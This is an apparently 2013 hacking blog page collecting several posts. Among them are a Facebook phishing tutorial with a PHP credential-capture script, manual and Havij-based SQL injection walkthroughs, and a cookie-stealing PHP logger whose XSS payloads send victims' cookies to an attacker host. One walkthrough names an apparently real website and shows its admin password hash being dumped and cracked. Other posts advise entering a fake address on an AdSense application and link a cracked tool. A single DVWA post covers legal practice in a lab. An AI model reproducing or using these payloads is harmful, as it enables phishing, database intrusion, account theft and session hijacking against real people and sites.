Subscribe For Free Updates!

We'll not spam mate! We promise.

Saturday 5 October 2013

Get Free Adsence Account in 1 Hour 100% Genuine Trick

Vvvvvv    11 comments

Get Free Adsence Account in 1 Hour 100% Genuine Trick 

adsence
Method

  1. First Create a Gmail account only and sign in.
  2. Then go to youtube.com and it is automatically sign in through your Gmail account.
  3. Then go to YouTube settings and click on enable on Monetisation setting. by going in to channel settings and then click on Enable Monetisation
  4. then it goes to new page which shows in blue “Enable Monetisation ” and a pop option will show then tick mark on all box then next and click on “got it”
  5. Then again, go to YouTube setting and then view Monetisation setting.
  6. Then see a last 2 question “how I will paid”
  7. Then click on that question and click on “associate an adsense account”
  8. Then opening a next page and click on next or change and then it redirect to log in page, and select “yes to proceed Google sign in “or you can select different Google sign in. then it goes to adsense form and fill up all form.(Please put correct post code, and your house no on 1st address if u have not house no then put fake the you will change after approve)
  9. Then submit application and wait 1 hr and see, your adsense account is approved.

Read More

Thursday 26 September 2013

How to make phishing page for Facebook Step By Step

Vvvvvv    9 comments

How to make phishing page for Facebook

facebook phishing

1. Go to www.facebook.com/ and right click on an empty place anywhere on main Facebook page and select <View page source>
NOTE: This option may look different if you are using any other browser, Since i am using Google chrome, i get the following view. If you are using Firefox or any other browser, options may vary.
pic1

2. You will get the view of source code as following . Just hit <Ctrl + A>to select all code and <Ctrl + C> to copy it.
pic2


3. Paste the copied source code in any text editor . (I prefer Windows Notepad because it saves the text as plain).
Go to top of the page and hit <Ctrl + F>  and find  <action>
(you will probably find it in 5th or 6th line of coding.)
pic3
4. Now select the URL address with in quotes (right next to ‘action’) and replace it with <post.php>
pic4
Save this file on desktop with name ‘index.html‘  (you can save it with any other name)
Note : After you save a text file with .html extension. Web browser treats this file as a web page.
Congratulations! you have just achieved the hacking level 1 milestone (code junkie) by copying html code from a website successfully.
Now open that file and notice that this page looks like original Facebook page but the address in address bar shows that this page exists on your desktop.
pic5

5. Now its time to create the <post.php> file. Yes ! you guessed it right. its the same file we replaced URL with in step 4.
Ya ya, i know you guys are really smart.
Ok, all you have to do is to copy the following code and paste it in a new Notepad window and save it with name <post.php>
<?php
header ('Location:http:/www.facebook.com');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Your ‘post.php’ file is ready

Read More

Saturday 21 September 2013

Set up your own Lab for practicing SQL injection and XSS : Ethical Hacking

Vvvvvv    4 comments



I hope you learned about the Sql injection and XSS from BTS.  But you may curious to practice
the SQLi and XSS attacks. we know that doing the attack on third-party website is crime.  So how
 can we do the practice? Here is the solution for you friends. Why shouldn't set up your own web
 application ? Yes, you can setup your own Pen Testing lab for practicing the XSS and SQLi
vulnerabilities.

When i surf in the internet, i come to know about the  "Damn Vulnerable Web App (DVWA)".
  It is one of web application that used for practicing your Ethical hacking/Pen Testing skills in legal
way.


Download this web Application from here:
Download Now

For Installing the this application, you will need XAMPP server.

The installation procedure :



Using this application , you can also practice:

  • LFI /RFI (File Inclusion methods)
  • Command Execution
  • Upload Script
  • Login Brute Force
if you have any doubts, check their wiki page or comment here.

Read More

Hacking website using SQL Injection -step by step guide without tool

Vvvvvv    1 comment

What a hacker can do with SQL Injection attack?

* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the MY SQL SERVER

So, here we go.
                     
Step 1: Finding Vulnerable Website
 To find vulnerability in any site you can use Google Dorks 
 Examples:---
   inurl:index.php?id=
   inurl:gallery.php?id=
   inurl:article.php?id=
   inurl:pageid=

     Here is a huge list of Google Dorks  Click here to See it 







after getting google dorks copy and paste the dork in google u will see lots of sites. open these
sites one by to check for vulnerability



 Note
if you like to hack particular website,then try this:
site:www.victimsite.com dork_list_commands
for eg: 
            site:www.victimsite.com inurl:index.php?id=            
Step 2. Checking The Vulnerability 

        To check vulnerability in any site simply put at the end of the url
        like this
                    www.du.ac.in/index.php?id=4‎'

If u Got any error just like this then the site vulnerable 
   You have an error in your SQL syntax; check the manual that corresponds to your MYSQl server version for the right syntax to use near '\'' at line 1
Step 3: Finding Number of columns:
Our next step is to find the number of columns present in the target database.

For that replace the single quotes(') with "order by n" statement.

 Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ".

For eg


 http://www.victimsite.com/index.php?id=2 order by 1
 http://www.victimsite.com/index.php?id=2 order by 2

If you get the error while trying the "x"th number,then no of column is "x-1".

I mean:
http://www.victimsite.com/index.php?id=2 order by 1(noerror)
http://www.victimsite.com/index.php?id=2 order by 2(noerror)
http://www.victimsite.com/index.php?id=2 order by 3(noerror)
http://www.victimsite.com/index.php?id=2 order by 4(noerror)
 so now x=8 , The number of column is x-1 i.e, 7.

 In case ,if the above method fails to work for you, then try to add the "--" at the end of the statement.
For eg:

 http://www.victimsite.com/index.php?id=2 order by 1--

 Step 4: Find the Vulnerable columns:
 Let us find  the vulnerable column by trying the query "union select columns_sequence".

 For eg:
if the number of columns is 7 ,then the query is as follow:

 http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

 If the above method is not working then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7-

it will display this 

IT says that column 3 and 7 are vunlerable 
Let us take the first vulnerable column '3' . We can inject our query in this column 


Step 5: Finding version,database,user

Replace the 3 from the query with "version()"

For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--

Now, It will display the version as 5.0.1 or 4.3. something like this.

Replace the version() with database() and user() for finding the database,user respectively.

For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working,then try this:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--

Step 6: Finding the Table NameIf the Database version is 5 or above. 
If the version is 4.x, then you have to guess the table names (blind sql injection attack).

Let us find the table name of the database. Replace the 3 with "group_concat(table_name)
 and add the "from information_schema.tables where table_schema=database()"

For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables 
where table_schema=database()--


Now it will display the list  of table names. Find the table name which is related 
with the admin or user.

Let us choose the "admin " table.

Step 7: Finding the Column Name
Now replace the "group_concat(table_name) with
 the "group_concat(column_name)"

Replace the "from information_schema.tables where table_schema=database()--
with "FROM information_schema.columns WHERE table_name=mysqlchar--

We have to convert the table name to MySql CHAR() string .
Install the HackBar addon:


Once you installed the add-on, you can see a toolbar that will look like the following
 one. If you are not able to see the Hackbar, then press F9.

Select sql->Mysql->MysqlChar() in the Hackbar.


It will ask you to enter string that you want to convert to MySQLCHAR().  We want
 to convert the table name to MySQLChar .  In our case the table name is 'admin'.



Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.



Copy and paste the code at the end of the url instead of the "mysqlchar"

For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns 
where table_name=CHAR(97, 100, 109, 105, 110)--


The above query will display the list of column. 

For example: admin,password,admin_id,admin_name,admin_password,active,id
,admin_name,admin_pas ​ s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,
password..etc..

Now replace the replace group_concat(column_name) with group_concat(columnname1,0x3a,anothercolumnname2).

Now replace the " from information_schema.columns where table_name=
CHAR(97, 100, 109, 105, 110)" with the "from table_name"

For eg:
         http://www.victimsite.com/index.php?id=-2 
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 
from admin--

If the above query displays the 'column is not found' erro, then try another column name
 from the list.

If we got luck, then it will display the data stored in the database depending on your 
column name.  For instance, username and password column will display the login 
credentials stored in the database.

Step 8: Finding the Admin Panel:
Just try with url like:
http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/


If you got luck ,you will find the admin page using above urls. or you can some
kind of admin finder tools.

Warning:
The above post is completely for educational purpose only.  Never attempt to follow
 the above steps against third-party websites.  If you want to learn SQL injection attack
method , then you can learn in safe environment by setup your own lab

HOpe u like the tutorial join us and like us on facebook 

Read More

Hacking a website using Havij SQL injection:Full method for beginners

Vvvvvv    No comments

Hacking a website using Havij SQL injection:Full method for beginners 
Now Lets start---->

Things you will need -->

1. Havij SQL injection Tool, download it from here cracked version
2. A sql vunerable site, I am taking this site
http://toyonorte.com.co/catalogo_nuevos_...e.php?id=2 as an example.
Checking for sql vulnerability --->

Here i am taking http://toyonorte.com.co/catalogo_nuevos_detalle.php?id=2 as an example. 


Now to check is this site vulnerable to sql, I will simply add ' after the site url

like this http://toyonorte.com.co/catalogo_nuevos_detalle.php?id=2'

and i get this error on the site
You have an error in
your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near '\'' at line 1It means that site is vulnerable to sql injection.
Exploiting the vulnerable site ---> 

1. Open Havij and paste site url in target field and hit enter

2. Now wait for Havij to get all the databases of the website.

3. Now click on available databse of site and click on Get Tables like i am gonna 
select535480_toyonorte of my site like in image.
[Image: post.jpg] 


4. By clicking Get Tables Havij will look after the tables available in the database.
5. Now after the scanning Havij will get all tables, now the main work start , you have
to check it there table available named as admin, users and something
similar to these words like i get usuario in my website and select it and click on Get Columns. Like in pic given below.
[Image: post2.jpg] 
6. Now after clicking Get Columns havij will get all the columns available in users table.
7. In my case i found diffrent columns like id, login, pass an many more.
8. Now select the columns and click on Get Data like in pic given below.


[Image: post3.jpg] 
9. Now havij will look after the data available in columns login and password i.e admin username and passowrd like i get 
username --> admin password--> 21232f297a57a5a743894a0e4a801fc3 (in encrypted form)
Like in image below

[Image: post4.jpg] 
10. Now after i get
username and password there is a problem that passowrd i s encrypted in
mdm language , so we have to crack it .

11. To crack encrypted password just copy password click on MD5 tab in havij and paste the encrypted password in MD5 hash field and hit start.Now havij will try to crack the password. Like i cracked in image given below.[Image: post5.jpg] 
12. Now i get Password cracked as admin.

13. Now we will check for admin panel where we gonna login with username and passoword.

In my case i found http://toyonorte.com.co/admin/ as admin panel, now open it in a web browser and login with username and password and now you are in admin panel.
Credits Zoombie hacker

Read More

Monday 16 September 2013

Free Download-1000 Hack Tutorials Full Free

Vvvvvv    No comments

Free Download-1000 Hack Tutorials Full Free

amazing book i m giving it away for  free  learn everything about hacking,,,,,,,
DOWNLOAD THIS BOOK NOW 








Read More

Session hijacking or cookie stealing using php and javascript

Vvvvvv    3 comments

Here we show how you can hack a session using javascript and php.


 What is a cookie?

 A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser.A cookie is 
sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back 
by the browser unchanged everytime it accesses the server.
A cookie has a expiration time that is set by the server and are deleted automatically after the expiration
 time.
Cookie is used to maintain users authentication and to implement shopping cart during his navigation,
possibly across multiple visits.

 What can we do after stealing cookie?

 Well,as we know web sites authenticate their user's with a cookie,it can be used to hijack the victims session.
The victims stolen cookie can be replaced with our cookie to hijack his session.

 This is a cookie stealing script that steals the cookies of a user and store them in a text file, these cookied can later be utilised.
PHP Code:<?php
function GetIP(){if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))$ip = getenv("HTTP_CLIENT_IP");else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))$ip = getenv("HTTP_X_FORWARDED_FOR");else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))$ip = getenv("REMOTE_ADDR");else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))$ip = $_SERVER['REMOTE_ADDR'];else$ip = "unknown";return($ip);}
function logData(){$ipLog="log.txt";$cookie = $_SERVER['QUERY_STRING'];$register_globals = (bool) ini_get('register_gobals');if ($register_globals) $ip = getenv('REMOTE_ADDR');else $ip = GetIP();
$rem_port = $_SERVER['REMOTE_PORT'];$user_agent = $_SERVER['HTTP_USER_AGENT'];$rqst_method = $_SERVER['METHOD'];$rem_host = $_SERVER['REMOTE_HOST'];$referer = $_SERVER['HTTP_REFERER'];$date=date ("l dS of F Y h:i:s A");$log=fopen("$ipLog", "a+");
if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie");elsefputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");fclose($log);}
logData();
?>

 Save the script as a cookielogger.php on your server.
(You can get any free webhosting easily such as justfree,x10hosting etc..)

 Create an empty text file log.txt in the same directory on the webserver. The hijacked/hacked cookies 
will be automatically stored here.

 Now for the hack to work we have to inject this piece of javascript into the target's page. This can be done
 by adding a link in the comments page which allows users to add hyperlinks etc. But beware some sites 
dont allow javascript so you gotta be lucky to try this.

 The best way is to look for user interactive sites which contain comments or forums.

 Post the following code which invokes or activates the cookielogger on your host.

 Code:
<script language="Java script">document.location="http://www.yourhost.com/cookielogger.php?cookie=&quot; + document.cookie;</script>

 Your can also trick the victim into clicking a link that activates javascript.
Below is the code which has to be posted.

 Code:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?                              cookie='+document.cookie;">Click here!</a>

 Clicking an image also can activate the script.For this purpose you can use the below code.

 Code:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;"&gt;

 <img src="URL OF THE IMAGE"/></a>

 All the details like cookie,ipaddress,browser of the victim are logged in to log.txt on your hostserver

 In the above codes please remove the space in between javascript.

 Hijacking the Session:

 Now we have cookie,what to do with this..?
Download cookie editor mozilla plugin or you may find other plugins as well.

 Go to the target site
open cookie editor
Replace the cookie with the stolen cookie of the victim and 
refresh the page.Thats it!!! you should now be in his account.

  Download cookie editor mozilla plugin from here : https://addons.mozilla.org/en-US/firefox/addon/573

 Don't forget to comment if you like my post. 

Read More
Subscribe to: Posts (Atom)

 

Copyright © 2013 HackErS..AuthORity.